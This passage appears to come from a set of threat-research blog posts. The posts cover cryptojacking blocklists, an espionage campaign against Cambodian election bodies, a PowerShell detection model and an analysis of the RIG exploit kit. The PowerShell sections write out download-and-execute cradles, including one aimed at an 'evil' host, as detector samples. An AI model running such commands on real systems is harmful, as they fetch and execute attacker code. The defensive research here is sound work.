As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking the websites of known mining projects, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.
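As a minimal sketch of the domain- and naming-convention-based strategies above, the following Python code flags script references on a fetched page that match known mining domains or common miner script names. The blocklist entries and the audited URL are illustrative placeholders, not a complete or authoritative list.

```python
import re
import urllib.request

# Illustrative blocklist entries; a real deployment would consume a maintained feed.
BLOCKED_DOMAINS = {"coinhive.com", "coin-hive.com", "authedmine.com"}
SUSPICIOUS_NAMES = re.compile(r"(coinhive|cryptonight|deepminer|miner)\.min\.js", re.I)

def find_mining_scripts(html: str):
    """Return script src values that match known mining domains or naming conventions."""
    hits = []
    for src in re.findall(r'<script[^>]+src=["\']([^"\']+)["\']', html, re.I):
        domain = re.sub(r"^(https?:)?//", "", src).split("/")[0].lower()
        if any(domain.endswith(d) for d in BLOCKED_DOMAINS) or SUSPICIOUS_NAMES.search(src):
            hits.append(src)
    return hits

if __name__ == "__main__":
    url = "http://example.com/"  # hypothetical page to audit
    html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    for hit in find_mining_scripts(html):
        print("Possible coin mining script:", hit)
```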

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, a focus we expect to continue throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable to other forms of fraud or theft because of the perception that it attracts less attention from law enforcement. Further, victims may not realize their computer is infected beyond noticing a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group: we observed the toolsets we previously attributed to this group; the observed targets are in line with past group efforts and highly similar to known Chinese APT efforts; and we identified an IP address originating in Hainan, China, that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. The TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader

AIRBREAK C2

en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html

TOP_NEWS_Japan_to_Support_the_Election.js

(3c51c89078139337c2c92e084bb0904c) [Figure 4]

chemscalere[.]com

iric.gov.kh/LICADHO/Interview-Questions.pdf

[pdf]Interview-Questions.pdf.js

(e413b45a04bf5f812912772f4a14650f)

iric.gov.kh/LICADHO/Interview-Questions.pdf

[docx]Interview-Questions.docx.js

(cf027a4829c9364d40dcab3f14c1f6b7)

unknown

Interview_Questions.docx.js

(c8fdd2b2ddec970fa69272fdf5ee86cc)

scsnewstoday[.]com

atimes.com/article/philippines-draws-three-hard-new-lines-on-china/

Philippines-draws-three-hard-new-lines-on-china .js

(5d6ad552f1d1b5cfe99ddb0e2bb51fd7)

mlcdailynews[.]com

facebook.com/CNR.Movement/videos/190313618267633/

CNR.Movement.mp4.js

(217d40ccd91160c152e5fce0143b16ef)

Partyforumseasia[.]com

 

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost

Reuters

U.S. pushes NATO to ready more forces to deter Russian threat

us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat

Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen

BREAKING NEWS

cambodia-opposition-leader-denied-bail-again-in-treason-case

Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

  • EVILTECH (Backdoor):
    • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
    • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.
  • DADBOD (Credential Theft):
    • DADBOD is a tool used to steal user cookies.
    • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses, 112.66.188.28, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in were, in all cases, configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised, whether simply to gather intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example
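The decoded text in Figure 4 can be reproduced offline: the -encodedcommand argument takes a Base64 encoding of the UTF-16LE command text. The short Python sketch below round-trips such a blob; the command string is an illustrative stand-in mirroring the cradle described next, not the actual sample.

```python
import base64

# Build an illustrative encoded command the same way PowerShell expects it:
# Base64 over the UTF-16LE bytes of the command text.
example = "IEX (New-Object Net.WebClient).DownloadString('http://<url>')"
encoded_command = base64.b64encode(example.encode("utf-16-le")).decode()

def decode_powershell_command(blob: str) -> str:
    """-EncodedCommand payloads are Base64 over UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16-le")

print(encoded_command)
print(decode_powershell_command(encoded_command))
```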

Interestingly, the decoded command reveals stealthy, fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The DownloadString method downloads the contents of <url> into a memory buffer, which IEX then executes.

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set composed of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonyms, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its base form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)
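A minimal Python sketch of such a prefix-tree stemmer is shown below; the parameter list is a small illustrative subset, and the production implementation is considerably more involved. Each abbreviated token is walked through a trie of canonical parameter names and, when the prefix is unambiguous, replaced by the full form.

```python
class TrieStemmer:
    """Map abbreviated PowerShell parameter tokens (e.g. 'nol', 'nolo') to a canonical form."""

    def __init__(self, canonical_tokens):
        self.root = {}
        for token in canonical_tokens:
            node = self.root
            for ch in token.lower():
                node = node.setdefault(ch, {})
            node["$"] = token  # terminal marker holding the canonical spelling

    def stem(self, token):
        node = self.root
        for ch in token.lower():
            if ch not in node:
                return token  # unknown token, leave unchanged
            node = node[ch]
        # Walk forward while exactly one continuation exists, i.e. the prefix is unambiguous.
        while "$" not in node:
            branches = [key for key in node if key != "$"]
            if len(branches) != 1:
                return token  # ambiguous prefix, leave unchanged
            node = node[branches[0]]
        return node["$"]

# Illustrative subset of canonical PowerShell parameter names.
stemmer = TrieStemmer(["nologo", "noninteractive", "noprofile", "windowstyle"])
for token in ["NOL", "NOLO", "NOLOGO", "NonI"]:
    print(token, "->", stemmer.stem(token))
```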

The overall NLP pipeline we developed consists of the following key modules:

  • Decoder – detects and decodes any encoded text.
  • Named Entity Recognition (NER) – detects and recognizes entities such as IPs, URLs, email addresses, registry keys, etc.
  • Tokenizer – tokenizes the PowerShell command into a list of tokens.
  • Stemmer – stems tokens into a canonical, semantically identical form using the trie.
  • Vocabulary Vectorizer – vectorizes the list of tokens into a machine learning friendly format.
  • Supervised classifier – binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, and Deep Neural Networks.
  • Reasoning – the explanation of why the prediction was made, enabling analysts to validate predictions.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command
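A highly simplified sketch of these steps is shown below, using Python with scikit-learn. The regular expressions, the tiny training corpus, and the logistic regression classifier are illustrative stand-ins for the production modules described above, which are trained on a far larger curated corpus.

```python
import base64
import re

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://\S+|net\.webclient", re.I)

def preprocess(command: str) -> str:
    """Decoder + NER + normalization: expand -EncodedCommand blobs and
    replace URLs/entities with a placeholder token before tokenizing."""
    match = ENC_RE.search(command)
    if match:
        try:
            command += " " + base64.b64decode(match.group(1)).decode("utf-16-le", "ignore")
        except Exception:
            pass  # not valid Base64; leave the command unchanged
    return URL_RE.sub(" URLTOKEN ", command).lower()

# Tiny illustrative corpus (1 = malicious, 0 = benign); the production model is
# trained on a large curated set of real commands.
encoded = base64.b64encode(
    "iex (new-object net.webclient).downloadstring('http://x/b')".encode("utf-16-le")).decode()
commands = [
    "powershell -nop -noni -w hidden -exec bypass iex (new-object net.webclient).downloadstring('http://x/a')",
    "powershell -command get-childitem c:\\logs | measure-object",
    "powershell -w hidden -enc " + encoded,
    "powershell get-service -name spooler",
]
labels = [1, 0, 1, 0]

# LogisticRegression stands in for the kernel SVM / boosted trees / DNN classifiers.
model = make_pipeline(CountVectorizer(token_pattern=r"[a-z0-9.\-]+"), LogisticRegression())
model.fit([preprocess(c) for c in commands], labels)

test = "powershell -noni -w hidden iex (new-object net.webclient).downloadstring('http://evil/a.ps1')"
print("malicious probability:", model.predict_proba([preprocess(test)])[0][1])
```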

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique

Introduction

Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.


Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.


Figure 2: Injected iframe

The landing page contains three different JavaScript snippets, each of which uses a different technique to deliver the payload. None of these techniques is new, so we will only give a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.


Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189, which allows it to download the payload and execute it using the code snippet seen in Figure 4.


Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.


Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419, which leverages a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.


Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters to trigger CVE-2015-2419, which in turn causes native code execution, as shown in Figure 7.


Figure 7: Call to JSON.Stringify

JavaScript 3

The third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits CVE-2018-4878, as shown in Figure 8.


Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.


Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.


Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.


Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from the NSIS files, the payload has two components: a DLL and a data file (named ‘kumar.dll’ and ‘abaram.dat’, respectively, in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function contains code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns the dropper again in a suspended state and injects the decrypted PE into the new process using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also checks the BeingDebugged flag at offset 0x2 of the PEB and terminates itself if the flag is set.

The malware also implements an anti-VM check by opening the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum and querying the value named "0".

It checks whether the value data contains any of the strings vmware, virtual, qemu, or xen, each of which is indicative of a virtual machine environment.
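This check is easy to reproduce on a Windows analysis VM with a few lines of Python using the standard winreg module; the marker strings mirror those listed above.

```python
import winreg

VM_MARKERS = ("vmware", "virtual", "qemu", "xen")

def disk_enum_looks_virtual() -> bool:
    """Read the Disk\\Enum value '0' and check it for hypervisor-related strings,
    mirroring the anti-VM check performed by the second stage payload."""
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"SYSTEM\ControlSet001\Services\Disk\Enum")
    try:
        data, _value_type = winreg.QueryValueEx(key, "0")
    finally:
        winreg.CloseKey(key)
    return any(marker in str(data).lower() for marker in VM_MARKERS)

if __name__ == "__main__":
    print("VM artifacts present:", disk_enum_looks_virtual())
```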

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works against a process running at an equal or lower integrity level. The malware first checks whether the current process is running at medium integrity level (0x2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.


Figure 12: Checking integrity level of current process

If the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.

The malware creates a file mapping object and writes the dropper file path to it; the injected code later reads the path from the same mapping object and deletes the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with a hardcoded value (Figure 13).

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791


Figure 13: Creating file mapping object name
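Assuming both the serial number and the XOR result are rendered as eight-digit hexadecimal strings (the exact string formatting is our assumption; the constant comes from the sample), the object name can be reproduced with the Python sketch below, which can be handy when hunting for the mapping object on a suspect Windows host.

```python
import ctypes

XOR_CONSTANT = 0x7E766791

def mapping_object_name(volume_serial: int) -> str:
    """Name = <serial> + (<serial> XOR 0x7E766791); hex formatting is an assumption."""
    return f"{volume_serial:08X}{(volume_serial ^ XOR_CONSTANT) & 0xFFFFFFFF:08X}"

def system_drive_serial() -> int:
    """Fetch the volume serial number of C:\\ via GetVolumeInformationW."""
    serial = ctypes.c_uint32(0)
    ctypes.windll.kernel32.GetVolumeInformationW(
        ctypes.c_wchar_p("C:\\"), None, 0,
        ctypes.byref(serial), None, None, None, 0)
    return serial.value

if __name__ == "__main__":
    print(mapping_object_name(system_drive_serial()))
```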

The malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has modified its header so that it is not detected as a PE file during memory scanning. After restoring several header fields at the start of the decrypted data, we recover a proper executable header (Figure 14).


Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).


Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses the EnumChildWindows and EnumProps functions to enumerate all entries in the window property lists and compares each property name against UxSubclassInfo.

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.
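The enumeration half of this sequence can be reproduced harmlessly from Python with ctypes, which helps clarify what the malware is searching for. The sketch below is read-only, performs no injection, and may return nothing on systems where the property lives on child windows rather than the top-level shell window.

```python
import ctypes
from ctypes import wintypes

user32 = ctypes.WinDLL("user32", use_last_error=True)
user32.GetShellWindow.restype = wintypes.HWND

# BOOL CALLBACK PropEnumProc(HWND hwnd, LPCSTR lpszString, HANDLE hData)
PROPENUMPROC = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND,
                                  ctypes.c_void_p, wintypes.HANDLE)
user32.EnumPropsA.argtypes = [wintypes.HWND, PROPENUMPROC]

def list_window_props(hwnd):
    """Enumerate a window's property list, as the malware does with EnumProps."""
    props = []

    def on_prop(_hwnd, name_ptr, handle):
        # Properties registered with a string name arrive as a pointer; properties
        # registered with an atom arrive as a small integer (< 0x10000) and are skipped.
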